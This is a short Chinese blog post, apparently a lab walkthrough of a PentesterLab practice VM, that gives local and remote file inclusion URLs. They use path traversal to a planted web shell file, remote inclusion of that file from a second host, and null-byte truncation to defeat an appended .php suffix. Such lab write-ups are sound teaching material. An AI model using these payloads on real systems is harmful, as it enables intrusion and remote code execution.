关于pentester系统的下载和安装可进入右边的链接进行学习——
下面实验开始。
(1)example1本地文件包含漏洞
(a)在/home/user/目录下新建muma.txt文件,并写入一句话木马:
(b)在浏览器中输入url:
http://192.168.227.148/fileincl/example1.php?page=../../../../../../../../home/user/muma.txt
(2)Example1远程文件包含漏洞
同上,将路径名换成url:
http://192.168.227.148/fileincl/example2.php?page=http://192.168.227.147/muma.txt
(3)example2本地文件包含漏洞
(a)直接输入url:
报错!
(b)按照错误信息找到产生漏洞的php文件:
发现在我们输入的文件名后增加了php后缀,那么就要采取截断。
(c)输入url:
http://192.168.227.148/fileincl/example2.php?page=../../../../../../home/user/muma.txt%00
(4)Example2远程文件包含漏洞
(a)直接输入url:
http://192.168.227.148/fileincl/example2.php?page=http://192.168.227.147/muma.txt
报错!
(b)按照错误信息找到产生漏洞的php文件:
发现在我们输入的文件名后增加了php后缀,那么就要采取截断。
(c)输入url:
http://192.168.227.148/fileincl/example2.php?page=http://192.168.227.147/muma.txt%00
2020-03-08 18:21:03
原文:https://www.cnblogs.com/ynydk/p/12443985.html